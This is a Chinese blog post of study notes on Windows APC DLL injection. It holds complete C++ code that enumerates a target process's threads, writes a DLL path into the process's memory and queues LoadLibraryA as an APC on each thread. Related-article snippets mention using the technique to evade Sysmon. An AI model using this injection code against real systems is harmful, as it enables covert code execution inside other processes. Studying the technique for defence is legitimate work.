DLL注入:APC注入

最新推荐文章于 2024-09-22 14:56:36 发布
最新推荐文章于 2024-09-22 14:56:36 发布
阅读量918 收藏 7
点赞数
分类专栏: Windows编程 文章标签: c++ 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/geniusls/article/details/119658951
版权

   本人学习《Windows黑客编程技术详解》所做的学习笔记

  • 简介:APC为异步调用,指函数在特定线程中被异步执行,在操作系统中,APC是一种并发机制,用于异步IO,或者定时器。
  • 大致思路:每一个进程中都有一个APC队列,每当要执行一个函数时,就利用QueueUserAPC函数把一个APC函数压入队列中,当函数要被执行时,我们将函数以先进先出的形式执行函数,此时我们便可以把我们要注入的dll给放入队列中
  • 同步调用:像普通程序一样,需要按序进行,下一条代码必须要等上一条代码执行后,才能运行。
  • 异步调用:无需等待,直接执行。

1,进程遍历

我们选择注入的进程,与远线程注入不同的是,我们选择他已经有的线程进行注入,为了保证能被进程有效调用,我们选择遍历进程中的所有进程并且全部注入我们的dll。

1,CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) 获得系统进程快照句柄

HANDLE_WINAPI CreateToolHelp32Snapshot(
      DWORD dwFlags,         //获取的类型
      DWORD th32ProcessID    //指向要获取的进程快照,全部为0
);
TH32CS_SNAPHEAPLIST:表示快照信息包含特定进程的堆栈列表
TH32CS_SNAPMODULE :表示快照信息包含特定进程的使用模块的列表
TH32CS_SNAPPROCESS:表示快照信息包含系统的所有进程的列表
TH32CS_SNAPTHREAD :表示快照信息包含系统所有线程的列表

2,Process32First(hSnapshot, &pe32) 获取第一个进程的快照信息

Process32Next(hSnapshot, &pe32) 获取下一个进程的快照信息

Thread32First(hSnapshot, &te32) 获得第一个线程的快照信息

Thread32Next(hSnapshot, &te32) 获取下一个线程的快照信息

BOOL WINAPI Process32First(
    HANDLE hSnapshot,                    // 系统进程的句柄
    LPPROCESSENTRY32/THREADENTRY32 lppe  // 进程/线程 快照的结构体
);

3,RtlZeroMemory(pThreadId, (dwBufferLength * sizeof(DWORD))) 用0填充一块内存

void ZeroMemory(
    PVOID  Destination, //地址
    SIZE_T Length       //填0的长度
);

完成代码

// 根据进程名称获取PID
DWORD GetProcessIdByProcessName(const char *pszProcessName)
{
	DWORD dwProcessId = 0;
	PROCESSENTRY32 pe32 = { 0 };
	HANDLE hSnapshot = NULL;
	BOOL bRet = FALSE;
	::RtlZeroMemory(&pe32, sizeof(pe32));
	pe32.dwSize = sizeof(pe32);

	// 获取进程快照
	hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (NULL == hSnapshot)
	{
		ShowError("CreateToolhelp32Snapshot");
		return dwProcessId;
	}

	// 获取第一条进程快照信息
	bRet = ::Process32First(hSnapshot, &pe32);
	while (bRet)
	{
		// 获取快照信息
		if (0 == ::lstrcmpi(pe32.szExeFile, pszProcessName))
		{
			dwProcessId = pe32.th32ProcessID;
			break;
		}

		// 遍历下一个进程快照信息
		bRet = ::Process32Next(hSnapshot, &pe32);
	}

	return dwProcessId;
}


// 根据PID获取所有的相应线程ID
BOOL GetAllThreadIdByProcessId(DWORD dwProcessId, DWORD **ppThreadId, DWORD *pdwThreadIdLength)
{
	DWORD *pThreadId = NULL;
	DWORD dwThreadIdLength = 0;
	DWORD dwBufferLength = 1000;
	THREADENTRY32 te32 = { 0 };
	HANDLE hSnapshot = NULL;
	BOOL bRet = TRUE;

	do
	{
		// 申请内存
		pThreadId = new DWORD[dwBufferLength];
		if (NULL == pThreadId)
		{
			ShowError("new");
			bRet = FALSE;
			break;
		}
		::RtlZeroMemory(pThreadId, (dwBufferLength * sizeof(DWORD)));

		// 获取线程快照
		::RtlZeroMemory(&te32, sizeof(te32));
		te32.dwSize = sizeof(te32);
		hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
		if (NULL == hSnapshot)
		{
			ShowError("CreateToolhelp32Snapshot");
			bRet = FALSE;
			break;
		}

		// 获取第一条线程快照信息
		bRet = ::Thread32First(hSnapshot, &te32);
		while (bRet)
		{
			// 获取进程对应的线程ID
			if (te32.th32OwnerProcessID == dwProcessId)
			{
				pThreadId[dwThreadIdLength] = te32.th32ThreadID;
				dwThreadIdLength++;
			}

			// 遍历下一个线程快照信息
			bRet = ::Thread32Next(hSnapshot, &te32);
		}

		// 返回
		*ppThreadId = pThreadId;
		*pdwThreadIdLength = dwThreadIdLength;
		bRet = TRUE;

	} while (FALSE);

	if (FALSE == bRet)
	{
		if (pThreadId)
		{
			delete[]pThreadId;
			pThreadId = NULL;
		}
	}

	return bRet;
}

2,APC注入

完成上面简单的遍历,终于可以进入我们的正题了,APC注入!!

APC注入原理

在windows中,每个线程都会维护一个线程APC队列,通过QueueUserAPC把函数添加到指定线程APC队列中,当要执行函数时,Windows系统会发送一个软中断去执行函数,而用户模式下的APC队列,则需要线程处于可警告状态才能运行,一个线程在内部使用SignalObjectAndWait,SleepEx,WaitForSingleObjectEx,WaitForMulitpleObjectsEx等函数将用户的线程挂起变为可警告状态,则可以进行注入。

1,QueueUserAPC((PAPCFUNC)pLoadLibraryAFunc, hThread, (ULONG_PTR)pBaseAddress) 将函数压入队列中

DWORD QueueUserAPC(
  PAPCFUNC  pfnAPC,   //执行的函数
  HANDLE    hThread,  //线程
  ULONG_PTR dwData    //函数参数
);

完成代码

// APC注入
BOOL ApcInjectDll(const char *pszProcessName)
{
	char szDllPath[MAX_PATH] = { 0 };
	GetCurrentDirectoryA(MAX_PATH, szDllPath);
	strcat_s(szDllPath, "\\InjectDll.dll");
	BOOL bRet = FALSE;
	DWORD dwProcessId = 0;
	DWORD *pThreadId = NULL;
	DWORD dwThreadIdLength = 0;
	HANDLE hProcess = NULL, hThread = NULL;
	PVOID pBaseAddress = NULL;
	FARPROC pLoadLibraryAFunc = NULL;
	SIZE_T dwRet = 0, dwDllPathLen = (strlen(szDllPath) + 1);
	DWORD i = 0;

	do
	{
		// 根据进程名称获取PID
		dwProcessId = GetProcessIdByProcessName(pszProcessName);
		if (0 >= dwProcessId)
		{
			bRet = FALSE;
			break;
		}

		// 根据PID获取所有的相应线程ID
		bRet = GetAllThreadIdByProcessId(dwProcessId, &pThreadId, &dwThreadIdLength);
		if (FALSE == bRet)
		{
			bRet = FALSE;
			break;
		}

		// 打开注入进程
		hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
		if (NULL == hProcess)
		{
			ShowError("OpenProcess");
			bRet = FALSE;
			break;
		}

		// 在注入进程空间申请内存
		pBaseAddress = ::VirtualAllocEx(hProcess, NULL, dwDllPathLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
		if (NULL == pBaseAddress)
		{
			ShowError("VirtualAllocEx");
			bRet = FALSE;
			break;
		}
		// 向申请的空间中写入DLL路径数据 
		::WriteProcessMemory(hProcess, pBaseAddress, szDllPath, dwDllPathLen, &dwRet);
		if (dwRet != dwDllPathLen)
		{
			ShowError("WriteProcessMemory");
			bRet = FALSE;
			break;
		}

		// 获取 LoadLibrary 地址
		pLoadLibraryAFunc = ::GetProcAddress(::GetModuleHandle("kernel32.dll"), "LoadLibraryA");
		if (NULL == pLoadLibraryAFunc)
		{
			ShowError("GetProcessAddress");
			bRet = FALSE;
			break;
		}

		// 遍历线程, 插入APC
		for (i = 0; i < dwThreadIdLength; i++)
		{
			// 打开线程
			hThread = ::OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadId[i]);
			if (hThread)
			{
				// 插入APC
				::QueueUserAPC((PAPCFUNC)pLoadLibraryAFunc, hThread, (ULONG_PTR)pBaseAddress);
				// 关闭线程句柄
				::CloseHandle(hThread);
				hThread = NULL;
			}
		}

		bRet = TRUE;

	} while (FALSE);

	// 释放内存
	if (hProcess)
	{
		::CloseHandle(hProcess);
		hProcess = NULL;
	}
	if (pThreadId)
	{
		delete[]pThreadId;
		pThreadId = NULL;
	}

	return bRet;
}

Genius!
关注
专栏目录
关于dll注入方式的学习(APC注入
2201_75856701的博客
03-02 979
QueueUserAPC 函数的第一个参数表示执行函数的地址,当开始执行该APC的时候,程序会跳转到该函数地址处来执行。在线程下一次被调度的时候,就会执行APC函数,APC有两种形式,由系统产生的APC称为内核模式APC,由应用程序产生的APC被称为用户模式APC。这里介绍一下应用程序的APCAPC是往线程中插入一个回调函数,但是用的APC调用这个回调函数是有条件的,如msdn所示。当处于用户模式的APC被压入到线程APC队列后,线程并不会立刻执行压入的APC函数,而是要等到线程处于。
注入系列:APC注入(Ring3)
weixin_43742894的博客
03-22 965
APC注入的作用:APC注入可以让一个线程在它正常的执行路径运行之前执行一些其他的代码。 要了解APC注入,我们首先来了解Windows的APC机制。 APC机制详细可参考本文:https://blog.csdn.net/qq229596421/article/details/77828647 简单来说,APC 是一个简称,具体名字叫做异步过程调用。是软件中断的一种。 APC队列:每个线程都有...
初识APC机制&实现APC注入
最新发布
DamnVanish的博客
09-22 1118
其实就是一种骚姿势进行的DLL注入,而且动静比之前的小,又已经在运行的线程来回调插入到APC队列中的恶意DLL
DLL注入技术之APC注入
潜心学习
06-28 2516
DLL注入技术之APC注入     APC注入的原理是利用当线程被唤醒时APC中的注册函数会被执行的机制,并以此去执行我们的DLL加载代码,进而完成DLL注入的目的,其具体流程如下:     1)当EXE里某个线程执行到SleepEx()或者WaitForSingleObjectEx()时,系统就会产生一个软中断。     2)当线程再次被唤醒时,此线程会首先执行APC队列中的被注册的函
APC_dll注入
qq_36918532的博客
03-03 505
主要是以下五步 //注入器 //1.要注入到进程中首先要拿到进程ID //2.获取到LoadLibrary地址 //3.在目标程序的体内开辟一块内存,用来写入dll地址 //4.遍历线程-随便选一个目标进程的线程获取句柄 //5.插入APC,把LoadLibrary作为APC的回调参数,然后把目标进程的dll地址作为参数 #include<stdio.h> #include<stdlib.h> #include<Windows.h> #include<TlHelp3
通过异步过程调用(APC)注入DLL
07-02 720
关于APC的介绍,可以参考MSDN对Asynchronous Procedure Calls的介绍(索引APCs),下面是简单翻译的一段文字。 APC(Asynchronous Procedure Calls,异步过程调用)是指在一个特定的线程环境中异步的执行代码。当一个APC被添加到一个线程的APC队列的时候,系统会产生一个软中断;当线程下一次被调度的时候APC函数将被执行。操作系统产生的AP
Dll 注入 —— APC
LYSM
06-28 742
背景 APC,即异步过程调用(Asynchronous Procedure Call)是函数(过程)在特定线程中被异步执行。在Microsoft Windows操作系统中,APC是一种并发机制,用于异步IO或者定时器。 每一个线程都有自己的APC队列,可以使用QueueUserAPC函数把一个APC函数压入APC队列中。当用户模式的APC压入线程APC队列后,该线程并不直接调用APC函数,除非该线程是处于可通知状态,调用的顺序为先入先出(FIFO)。 函数介绍 QueueUserAPC // 如果函数成功,
内核DLL注入技术解析:APC与Kernel Patch方法
文章提到了两种常见的内核注入DLL的方法,分别是利用APC技术和内核Patch\\KnownDLLs\\Kernel32.dllCreateThread。这两种方法在不同的场景下有不同的优缺点,并且在安全软件开发和反恶意软件技术中具有一定的应用价值...
C++ APC注入.zip
08-06
C++ APC注入是一种高级的进程通信技术,常用于在Windows操作系统中实现远程线程注入。在本案例中,APC(Asynchronous Procedure Call)注入被用作替代方法,因为直接的DLL注入可能导致某些系统,如Win7,在特定情况...
通用DLL注入器-易语言
06-12
各种主流基本的注入操作集合 包含: 1、远程线程注入 2、消息钩子注入 3、输入法注入 4、注册表注入 5、EIP注入 6、APC注入(R3) 7、内存注入 8、IAT永久注入 9、内存永久注入
易语言移植的APC注入源码
06-06
易语言移植的APC注入源码是一个涉及到Windows操作系统编程、进程通信和恶意代码技术的知识点。APC(Asynchronous Procedure Call)是Windows API提供的一种异步处理机制,常用于线程间的通信。在易语言中实现APC注入...
DLL注入-APC注入
天使也掉毛
11-25 5701
DLL注入-APC注入
APC注入
推理小孩的博客
02-22 273
APC注入 0X01 注入原理       当线程被唤醒时APC中的注册函数会被执行的机制,并依此去调用我们的DLL加载代码,进而完成注入的目的             具体的流程:             1 当EXE里的某个线程执行到sleepEX(),或者waitForSingleObjectEX()(其实还有WaitForMultipleO...
内核中通过给线程插apc注入dll
sgzwiz的专栏
03-03 7876
void ApcLoadDll(PVOID NormalContext, PVOID SystemArgument1, PVOID SystemArgument2); void ApcLoadDllEnd(); PMDL pMdl = NULL; void ApcKernelRoutine( IN struct _KAPC *Apc, IN OUT PKNORMAL_ROUTINE
分析恶意驱动(进程启动apc注入dll)
weixin_30648963的博客
03-20 278
一、前言   用IDA也有好些时间了,以前就只会用F5功能玩无壳无保护的裸驱动,感觉太坑了,这两天就开始看网上大牛的逆向。   今天记录一下sudami曾经逆向过的fuck.sys。第一遍自己走的时候漏掉了好多东西,然后看他的新驱动,一步步比较,最后把驱动文件分析的比较明朗了。 二、分析    1.去除花指令   首先这个文件有的别多的花指令,jz,jnz 、jb,jnb、jo,j...
注入技术之APC注入
whs100505的博客
02-10 774
APC注入 原理:每个线程都有一个APC队列,当调用SleepEx,SignalObjectAndWait,WaitForSingleObjectEx,WaitForMultipleObjectsEx或MsgWaitForMultipleObjectsEx进入警报状态时,系统会遍历该线程的APC,按照先进先出的顺序执行APC。 #include <Windows.h> bool AP...
通过APC实现Dll注入——绕过Sysmon监控
weixin_34414196的博客
09-18 931
本文讲的是通过APC实现Dll注入——绕过Sysmon监控, 0x00 前言 要对指定进程进行远程注入,通常使用Windows提供的API CreateRemoteThread创建一个远程线程,进而注入dll或是执行shellcode Sysmon可用来监控和记录系统活动,可记录CreateRemoteThread操作 注入的方法不只有CreateRe...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值